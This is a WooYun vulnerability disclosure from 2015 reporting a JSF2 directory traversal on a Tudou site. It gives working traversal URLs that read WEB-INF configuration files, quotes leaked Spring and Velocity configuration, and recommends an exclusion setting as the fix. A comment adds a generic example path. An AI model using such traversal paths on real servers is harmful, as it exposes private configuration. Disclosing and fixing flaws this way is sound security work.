当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103838

漏洞标题:土豆网某站点存在JavaServer Faces 2目录遍历漏洞

相关厂商:土豆网

漏洞作者: lijiejie

提交时间:2015-03-26 11:06

修复时间:2015-05-10 11:16

公开时间:2015-05-10 11:16

漏洞类型:系统/服务运维配置不当

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-04-05: 细节向核心白帽子及相关领域专家公开
2015-04-15: 细节向普通白帽子公开
2015-04-25: 细节向实习白帽子公开
2015-05-10: 细节向公众公开

简要描述:

土豆网某站点存在JavaServer Faces 2目录遍历漏洞,默认无法读取.properties文件,所以利用价值不高

详细说明:

目录遍历位于:

http://activity.tudou.com/javax.faces.resource.../WEB-INF/web.xml.jsf
http://activity.tudou.com/javax.faces.resource.../WEB-INF/classes/spring/spring-servlet.xml.jsf
http://activity.tudou.com/javax.faces.resource.../WEB-INF/classes/spring/main.xml.jsf
http://activity.tudou.com/javax.faces.resource.../WEB-INF/velocity/toolbox.xml.jsf


默认的,是无法读取

.class
.jsp
.jspx
.properties
.xhtml
.groovy


所以利用价值相对低

漏洞证明:

<!-- 静态资源映射 -->
<mvc:resources mapping="/static/**" location="/static/" />
<mvc:resources mapping="/js/**" location="/js/" />
<mvc:resources mapping="/img/**" location="/img/" />

<!-- velocity视图解析器 -->
<bean id="velocityViewResolver"
class="org.springframework.web.servlet.view.velocity.VelocityViewResolver">
<property name="cache" value="false"></property><!--是否缓存模板-->
<property name="order" value="10" />
<property name="suffix" value=".jsp"/>
<property name="exposeSpringMacroHelpers" value="true" />
<property name="dateToolAttribute" value="dateTool"/>
<property name="numberToolAttribute" value="numberTool"/>
<property name="toolboxConfigLocation" value="WEB-INF/velocity/toolbox.xml" />
<property name="contentType" value="text/html;charset=UTF-8"></property>
</bean>
<!-- velocity环境配置 -->
<bean id="velocityConfig"
class="org.springframework.web.servlet.view.velocity.VelocityConfigurer">
<!-- velocity配置文件路径 -->
<property name="configLocation" value="WEB-INF/velocity/velocity.properties" />
<!-- velocity模板路径 -->
<property name="resourceLoaderPath" value="/" />
</bean>


<!-- base -->
<import resource="classpath:spring/ctx-base.xml" />
<!-- module -->
<import resource="classpath:spring/db.xml" />
<import resource="classpath:spring/ctx-system-common.xml" />
<import resource="classpath:spring/ctx-tudou-client.xml" />
<import resource="classpath:spring/memcached.xml" />
<import resource="classpath:spring/captcha.xml" />

修复方案:

升级 或者修改web.xml,排除.xml

<context-param>
<param-name>javax.faces.RESOURCE_EXCLUDES</param-name>
<param-value>.xhtml .class .jsp .jspx .properties .xml</param-value>
</context-param>


版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-03-26 11:15

厂商回复:

多谢,确认漏洞。

最新状态:

2015-03-26:已修复。


漏洞评价:

评论

  1. 2015-03-26 11:09 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    你说这个啊 http://security.coverity.com/advisory/2013/Oct/two-path-traversal-defects-in-oracles-jsf2-implementation.htmlhttp://www.example.com/someApp/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..

  2. 2015-03-26 11:12 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    关注!